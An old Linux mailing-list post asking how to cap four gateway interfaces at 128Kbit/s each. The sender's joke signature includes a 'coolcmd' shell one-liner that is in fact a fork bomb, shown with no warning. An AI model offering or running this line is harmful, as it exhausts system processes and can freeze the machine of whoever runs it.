Hello.
I need help with limiting bandwidth. I have read every tutorial I've come
over and I just can't make anything work.
Ok, here's the scenario:
I have a gateway, which has five network interfaces (eth0 -> eth4), eth0 is
the 'external' one and eth[1-4] are supposed to be limited to 128Kbit/s each.
The interfaces eth[1-4] each have a C-class net, 192.168.[1-4].0/24.
Thanks for any and all help.
linux 2.4.0-test9
debian 2.2 (potato)
---------
typedef struct me_s {
char name[] = { "Thomas Habets" };
char email[] = { "thomas@xxxxxxxxxxxx" };
char kernel[] = { "Linux 2.2" };
char *pgpKey[] = { "finger -m thompa@xxxxxxxxxxxxxx" };
char pgpfinger[] = { "6517 2898 6AED EA2C 1015 DCF0 8E53 B69F 524B B541" };
char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;